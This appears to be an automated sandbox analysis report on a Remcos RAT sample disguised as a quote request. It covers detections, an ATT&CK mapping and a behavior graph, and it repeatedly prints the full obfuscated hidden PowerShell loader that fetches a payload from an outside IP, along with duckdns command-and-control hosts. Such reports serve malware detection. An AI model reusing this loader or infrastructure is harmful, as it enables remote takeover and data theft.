              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$nabolandenes = 1;$kapsle='s';$kapsle+='ubstrin';$kapsle+='g';function handig($fyldepenneblkket){$bytteforholdet=$fyldepenneblkket.length-$nabolandenes;for($columbaries=4; $columbaries -lt $bytteforholdet; $columbaries+=(5)){$festskriftets+=$fyldepenneblkket.$kapsle.invoke( $columbaries, $nabolandenes);}$festskriftets;}function xerotherm($drapers){& ($normalprisen) ($drapers);}$palmehavers=handig 'k njmresaoafstznedsifestl urlfokuaunr /half5re,u. unb0bld tan(postwfrekispeengarddv,cioinf.wsings hea bracn roqtl.at babo1d,mi0qq.a.sten0prop;thec defiwnoncietagnopry6amel4topc;gela hetzxindk6comp4f.rt;bill erhvr denv n.n:.syc1basi2sdsu1ge t.jens0 spa)prim unbogstamesleec,fskklovlomain/ .om2nulp0carb1f rr0reor0offi1.ykk0ahis1tffe tref twoiunwrr disesvrdfgattos,rix ibr/poli1far.2dump1 as .enhy0thus ';$nysseliges=handig ',undu eges ignesnotr ins-albua,lleg,useeupstnisoitanni ';$fordommes=handig ' odeh zigtgacatj,jup fl,:.ent/b gg/ lor8aden7tors.do.m1mult2 und1dy,n.unbr1cute0 reg5appl.mast1 ic6a mb3dete/filttunexekonsrwa.smaut.i rovnska.astocl patjbipaotigebd sk.overtmetaoekspcrhab ';$problemanalysernes=handig 'uro.>fe.l ';$normalprisen=handig 'mic.iskaaeregex str ';$schizophasia='heterozygotes';xerotherm (handig 'undesregoepas.tdehu- je c stio unsngeomtunteetalln re.tspir stil-beatpimpra stetplurhsl.g ko,mt h.b:part\sp,nk.also,mpir alysnitre w mtsemismonr.t.att ch xs,nstdisp ,fsk-fuglv la,atipslskarula,se bo lr t$ uscsmisac hydhr.kei looz kigorep.plderhacicadisrsappeiaggra,rro;ge e ');xerotherm (handig ' s,pi chef ,or labr(aaletfacoe torsdub tindk- strpmalaaheavtti.eh,ndi h net li.:sp l\demokabsoorekormenisa.foeunsctun es.eta.unibtbentx adet a.s)kvin{eksae pasx,oeci rentequa} fer;trop ');$wedeln = handig 'nonmedemycbedeh iewofor edan%kon.al,plpfarmpmakedara awoodtbisuaraft% gen\ma,epriksltillespaau oodrfun.osenstforbhc.mpolys,t tito ca nunblu ma,samer.imprddistidi,il las gara&post&staf c,loef.tocgennhfangochi, tor$over ';xerotherm (handig 'tore$ mangothiltrilounstbtr,na.aval ove:paabsopt.w engedir.elus pantryt pe=gaze(s ecc strmpnhedudda fejl/,avlcpr t utl$,agswtrine,ilbd dydefly.lty.inkar.)plat ');xerotherm (handig 'pr s$briegstral ,odono,ib ,ndaintelsu.e:facod cleedo.ab prianarktbeeftkonte varabramtuds.rcam eic.nn stoeutths reu=tall$plamfan.no f rrstradc.ibodisgmnstemins,eklarscali.pr bsdetepkr,vlreacisangt urf(gill$teisp sk.re spoprombb tol domecuttmt,lda.allnrhamajordlopryypickswo keartsrbox.n prlea,etsafsp)slad ');$fordommes=$debatteatrenes[0];xerotherm (handig ' era$leucg irklspeeof.nabencaabal,lcent:b atustj.roplaeamphtgeore f arsourobagggfor.r ephaloc.pa sehbars=alfan redekaglwblyg- acco antbforlj boneugudcantetdiff logaspulvykonfs a btbillen,dummikr.atomnsystehetetm.ni.,andwmarke.ussb si.cs lvlph.ni p,cenondnquintopsp ');xerotherm (handig 'spin$,jouubehjrant,etro,tafstebrikri.dsoarbegsuppradgaareflp ambh ec..toplhglobes,beabedudgratemor.
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$nabolandenes = 1;$kapsle='s';$kapsle+='ubstrin';$kapsle+='g';function handig($fyldepenneblkket){$bytteforholdet=$fyldepenneblkket.length-$nabolandenes;for($columbaries=4; $columbaries -lt $bytteforholdet; $columbaries+=(5)){$festskriftets+=$fyldepenneblkket.$kapsle.invoke( $columbaries, $nabolandenes);}$festskriftets;}function xerotherm($drapers){& ($normalprisen) ($drapers);}$palmehavers=handig 'k njmresaoafstznedsifestl urlfokuaunr /half5re,u. unb0bld tan(postwfrekispeengarddv,cioinf.wsings hea bracn roqtl.at babo1d,mi0qq.a.sten0prop;thec defiwnoncietagnopry6amel4topc;gela hetzxindk6comp4f.rt;bill erhvr denv n.n:.syc1basi2sdsu1ge t.jens0 spa)prim unbogstamesleec,fskklovlomain/ .om2nulp0carb1f rr0reor0offi1.ykk0ahis1tffe tref twoiunwrr disesvrdfgattos,rix ibr/poli1far.2dump1 as .enhy0thus ';$nysseliges=handig ',undu eges ignesnotr ins-albua,lleg,useeupstnisoitanni ';$fordommes=handig ' odeh zigtgacatj,jup fl,:.ent/b gg/ lor8aden7tors.do.m1mult2 und1dy,n.unbr1cute0 reg5appl.mast1 ic6a mb3dete/filttunexekonsrwa.smaut.i rovnska.astocl patjbipaotigebd sk.overtmetaoekspcrhab ';$problemanalysernes=handig 'uro.>fe.l ';$normalprisen=handig 'mic.iskaaeregex str ';$schizophasia='heterozygotes';xerotherm (handig 'undesregoepas.tdehu- je c stio unsngeomtunteetalln re.tspir stil-beatpimpra stetplurhsl.g ko,mt h.b:part\sp,nk.also,mpir alysnitre w mtsemismonr.t.att ch xs,nstdisp ,fsk-fuglv la,atipslskarula,se bo lr t$ uscsmisac hydhr.kei looz kigorep.plderhacicadisrsappeiaggra,rro;ge e ');xerotherm (handig ' s,pi chef ,or labr(aaletfacoe torsdub tindk- strpmalaaheavtti.eh,ndi h net li.:sp l\demokabsoorekormenisa.foeunsctun es.eta.unibtbentx adet a.s)kvin{eksae pasx,oeci rentequa} fer;trop ');$wedeln = handig 'nonmedemycbedeh iewofor edan%kon.al,plpfarmpmakedara awoodtbisuaraft% gen\ma,epriksltillespaau oodrfun.osenstforbhc.mpolys,t tito ca nunblu ma,samer.imprddistidi,il las gara&post&staf c,loef.tocgennhfangochi, tor$over ';xerotherm (handig 'tore$ mangothiltrilounstbtr,na.aval ove:paabsopt.w engedir.elus pantryt pe=gaze(s ecc strmpnhedudda fejl/,avlcpr t utl$,agswtrine,ilbd dydefly.lty.inkar.)plat ');xerotherm (handig 'pr s$briegstral ,odono,ib ,ndaintelsu.e:facod cleedo.ab prianarktbeeftkonte varabramtuds.rcam eic.nn stoeutths reu=tall$plamfan.no f rrstradc.ibodisgmnstemins,eklarscali.pr bsdetepkr,vlreacisangt urf(gill$teisp sk.re spoprombb tol domecuttmt,lda.allnrhamajordlopryypickswo keartsrbox.n prlea,etsafsp)slad ');$fordommes=$debatteatrenes[0];xerotherm (handig ' era$leucg irklspeeof.nabencaabal,lcent:b atustj.roplaeamphtgeore f arsourobagggfor.r ephaloc.pa sehbars=alfan redekaglwblyg- acco antbforlj boneugudcantetdiff logaspulvykonfs a btbillen,dummikr.atomnsystehetetm.ni.,andwmarke.ussb si.cs lvlph.ni p,cenondnquintopsp ');xerotherm (handig 'spin$,jouubehjrant,etro,tafstebrikri.dsoarbegsuppradgaareflp ambh ec..toplh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$nabolandenes = 1;$kapsle='s';$kapsle+='ubstrin';$kapsle+='g';function handig($fyldepenneblkket){$bytteforholdet=$fyldepenneblkket.length-$nabolandenes;for($columbaries=4; $columbaries -lt $bytteforholdet; $columbaries+=(5)){$festskriftets+=$fyldepenneblkket.$kapsle.invoke( $columbaries, $nabolandenes);}$festskriftets;}function xerotherm($drapers){& ($normalprisen) ($drapers);}$palmehavers=handig 'k njmresaoafstznedsifestl urlfokuaunr /half5re,u. unb0bld tan(postwfrekispeengarddv,cioinf.wsings hea bracn roqtl.at babo1d,mi0qq.a.sten0prop;thec defiwnoncietagnopry6amel4topc;gela hetzxindk6comp4f.rt;bill erhvr denv n.n:.syc1basi2sdsu1ge t.jens0 spa)prim unbogstamesleec,fskklovlomain/ .om2nulp0carb1f rr0reor0offi1.ykk0ahis1tffe tref twoiunwrr disesvrdfgattos,rix ibr/poli1far.2dump1 as .enhy0thus ';$nysseliges=handig ',undu eges ignesnotr ins-albua,lleg,useeupstnisoitanni ';$fordommes=handig ' odeh zigtgacatj,jup fl,:.ent/b gg/ lor8aden7tors.do.m1mult2 und1dy,n.unbr1cute0 reg5appl.mast1 ic6a mb3dete/filttunexekonsrwa.smaut.i rovnska.astocl patjbipaotigebd sk.overtmetaoekspcrhab ';$problemanalysernes=handig 'uro.>fe.l ';$normalprisen=handig 'mic.iskaaeregex str ';$schizophasia='heterozygotes';xerotherm (handig 'undesregoepas.tdehu- je c stio unsngeomtunteetalln re.tspir stil-beatpimpra stetplurhsl.g ko,mt h.b:part\sp,nk.also,mpir alysnitre w mtsemismonr.t.att ch xs,nstdisp ,fsk-fuglv la,atipslskarula,se bo lr t$ uscsmisac hydhr.kei looz kigorep.plderhacicadisrsappeiaggra,rro;ge e ');xerotherm (handig ' s,pi chef ,or labr(aaletfacoe torsdub tindk- strpmalaaheavtti.eh,ndi h net li.:sp l\demokabsoorekormenisa.foeunsctun es.eta.unibtbentx adet a.s)kvin{eksae pasx,oeci rentequa} fer;trop ');$wedeln = handig 'nonmedemycbedeh iewofor edan%kon.al,plpfarmpmakedara awoodtbisuaraft% gen\ma,epriksltillespaau oodrfun.osenstforbhc.mpolys,t tito ca nunblu ma,samer.imprddistidi,il las gara&post&staf c,loef.tocgennhfangochi, tor$over ';xerotherm (handig 'tore$ mangothiltrilounstbtr,na.aval ove:paabsopt.w engedir.elus pantryt pe=gaze(s ecc strmpnhedudda fejl/,avlcpr t utl$,agswtrine,ilbd dydefly.lty.inkar.)plat ');xerotherm (handig 'pr s$briegstral ,odono,ib ,ndaintelsu.e:facod cleedo.ab prianarktbeeftkonte varabramtuds.rcam eic.nn stoeutths reu=tall$plamfan.no f rrstradc.ibodisgmnstemins,eklarscali.pr bsdetepkr,vlreacisangt urf(gill$teisp sk.re spoprombb tol domecuttmt,lda.allnrhamajordlopryypickswo keartsrbox.n prlea,etsafsp)slad ');$fordommes=$debatteatrenes[0];xerotherm (handig ' era$leucg irklspeeof.nabencaabal,lcent:b atustj.roplaeamphtgeore f arsourobagggfor.r ephaloc.pa sehbars=alfan redekaglwblyg- acco antbforlj boneugudcantetdiff logaspulvykonfs a btbillen,dummikr.atomnsystehetetm.ni.,andwmarke.ussb si.cs lvlph.ni p,cenondnquintopsp ');xerotherm (handig 'spin$,jouubehjrant,etro,tafstebrikri.dsoarbegsuppradgaareflp ambh ec..toplhglobes,beabedudgratemor.Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$nabolandenes = 1;$kapsle='s';$kapsle+='ubstrin';$kapsle+='g';function handig($fyldepenneblkket){$bytteforholdet=$fyldepenneblkket.length-$nabolandenes;for($columbaries=4; $columbaries -lt $bytteforholdet; $columbaries+=(5)){$festskriftets+=$fyldepenneblkket.$kapsle.invoke( $columbaries, $nabolandenes);}$festskriftets;}function xerotherm($drapers){& ($normalprisen) ($drapers);}$palmehavers=handig 'k njmresaoafstznedsifestl urlfokuaunr /half5re,u. unb0bld tan(postwfrekispeengarddv,cioinf.wsings hea bracn roqtl.at babo1d,mi0qq.a.sten0prop;thec defiwnoncietagnopry6amel4topc;gela hetzxindk6comp4f.rt;bill erhvr denv n.n:.syc1basi2sdsu1ge t.jens0 spa)prim unbogstamesleec,fskklovlomain/ .om2nulp0carb1f rr0reor0offi1.ykk0ahis1tffe tref twoiunwrr disesvrdfgattos,rix ibr/poli1far.2dump1 as .enhy0thus ';$nysseliges=handig ',undu eges ignesnotr ins-albua,lleg,useeupstnisoitanni ';$fordommes=handig ' odeh zigtgacatj,jup fl,:.ent/b gg/ lor8aden7tors.do.m1mult2 und1dy,n.unbr1cute0 reg5appl.mast1 ic6a mb3dete/filttunexekonsrwa.smaut.i rovnska.astocl patjbipaotigebd sk.overtmetaoekspcrhab ';$problemanalysernes=handig 'uro.>fe.l ';$normalprisen=handig 'mic.iskaaeregex str ';$schizophasia='heterozygotes';xerotherm (handig 'undesregoepas.tdehu- je c stio unsngeomtunteetalln re.tspir stil-beatpimpra stetplurhsl.g ko,mt h.b:part\sp,nk.also,mpir alysnitre w mtsemismonr.t.att ch xs,nstdisp ,fsk-fuglv la,atipslskarula,se bo lr t$ uscsmisac hydhr.kei looz kigorep.plderhacicadisrsappeiaggra,rro;ge e ');xerotherm (handig ' s,pi chef ,or labr(aaletfacoe torsdub tindk- strpmalaaheavtti.eh,ndi h net li.:sp l\demokabsoorekormenisa.foeunsctun es.eta.unibtbentx adet a.s)kvin{eksae pasx,oeci rentequa} fer;trop ');$wedeln = handig 'nonmedemycbedeh iewofor edan%kon.al,plpfarmpmakedara awoodtbisuaraft% gen\ma,epriksltillespaau oodrfun.osenstforbhc.mpolys,t tito ca nunblu ma,samer.imprddistidi,il las gara&post&staf c,loef.tocgennhfangochi, tor$over ';xerotherm (handig 'tore$ mangothiltrilounstbtr,na.aval ove:paabsopt.w engedir.elus pantryt pe=gaze(s ecc strmpnhedudda fejl/,avlcpr t utl$,agswtrine,ilbd dydefly.lty.inkar.)plat ');xerotherm (handig 'pr s$briegstral ,odono,ib ,ndaintelsu.e:facod cleedo.ab prianarktbeeftkonte varabramtuds.rcam eic.nn stoeutths reu=tall$plamfan.no f rrstradc.ibodisgmnstemins,eklarscali.pr bsdetepkr,vlreacisangt urf(gill$teisp sk.re spoprombb tol domecuttmt,lda.allnrhamajordlopryypickswo keartsrbox.n prlea,etsafsp)slad ');$fordommes=$debatteatrenes[0];xerotherm (handig ' era$leucg irklspeeof.nabencaabal,lcent:b atustj.roplaeamphtgeore f arsourobagggfor.r ephaloc.pa sehbars=alfan redekaglwblyg- acco antbforlj boneugudcantetdiff logaspulvykonfs a btbillen,dummikr.atomnsystehetetm.ni.,andwmarke.ussb si.cs lvlph.ni p,cenondnquintopsp ');xerotherm (handig 'spin$,jouubehjrant,etro,tafstebrikri.dsoarbegsuppradgaareflp ambh ec..toplhJump to behavior
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager64\WindowsPowerShell\v1.0\powershell.ex
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005A1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005A1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managera
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager6be
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp, mvourhjs.dat.15.drBinary or memory string: [2024/05/02 17:22:16 Program Manager]
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8872, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8872, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              Registry Run Keys / Startup Folder              		112
              Process Injection              		11
              Masquerading              		11
              Input Capture              		21
              Security Software Discovery              		Remote Services11
              Input Capture              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              Registry Run Keys / Startup Folder              		1
              Modify Registry              		LSASS Memory2
              Process Discovery              		Remote Desktop Protocol1
              Archive Collected Data              		1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)1
              DLL Side-Loading              		61
              Virtualization/Sandbox Evasion              		Security Account Manager61
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive3
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook112
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging24
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing              		Cached Domain Credentials22
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435423 Sample: Teklif talebi BAKVENTA-BAKU... Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 53 jgbours284hawara02.duckdns.org 2->53 55 jgbours284hawara01.duckdns.org 2->55 57 3 other IPs or domains 2->57 79 Multi AV Scanner detection for domain / URL 2->79 81 Found malware configuration 2->81 83 Malicious sample detected (through community Yara rule) 2->83 87 6 other signatures 2->87 11 cmd.exe 1 2->11         started        14 chrome.exe 1 2->14         started        17 svchost.exe 1 2 2->17         started        19 chrome.exe 2->19         started        signatures3 85 Uses dynamic DNS services 55->85 process4 dnsIp5 97 Suspicious powershell command line found 11->97 99 Very long command line found 11->99 21 powershell.exe 14 23 11->21         started        25 conhost.exe 11->25         started        71 192.168.2.22 unknown unknown 14->71 73 192.168.2.4, 138, 3050, 3051 unknown unknown 14->73 75 239.255.255.250 unknown Reserved 14->75 27 chrome.exe 14->27         started        77 127.0.0.1 unknown unknown 17->77 29 chrome.exe 19->29         started        signatures6 process7 dnsIp8 59 87.121.105.163, 49730, 49749, 80 NET1-ASBG Bulgaria 21->59 89 Suspicious powershell command line found 21->89 91 Very long command line found 21->91 93 Found suspicious powershell code related to unpacking or dynamic code loading 21->93 31 powershell.exe 17 21->31         started        34 conhost.exe 21->34         started        36 cmd.exe 1 21->36         started        61 www.google.com 142.250.80.68, 443, 49731, 49755 GOOGLEUS United States 27->61 63 google.com 27->63 signatures9 process10 signatures11 101 Writes to foreign memory regions 31->101 103 Found suspicious powershell code related to unpacking or dynamic code loading 31->103 38 wab.exe 5 16 31->38         started        43 cmd.exe 1 31->43         started        process12 dnsIp13 65 jgbours284hawara01.duckdns.org 192.169.69.26, 3050, 3051, 49751 WOWUS United States 38->65 67 jgbours284hawara02.duckdns.org 45.88.90.110, 3050, 49753 LVLT-10753US Bulgaria 38->67 69 2 other 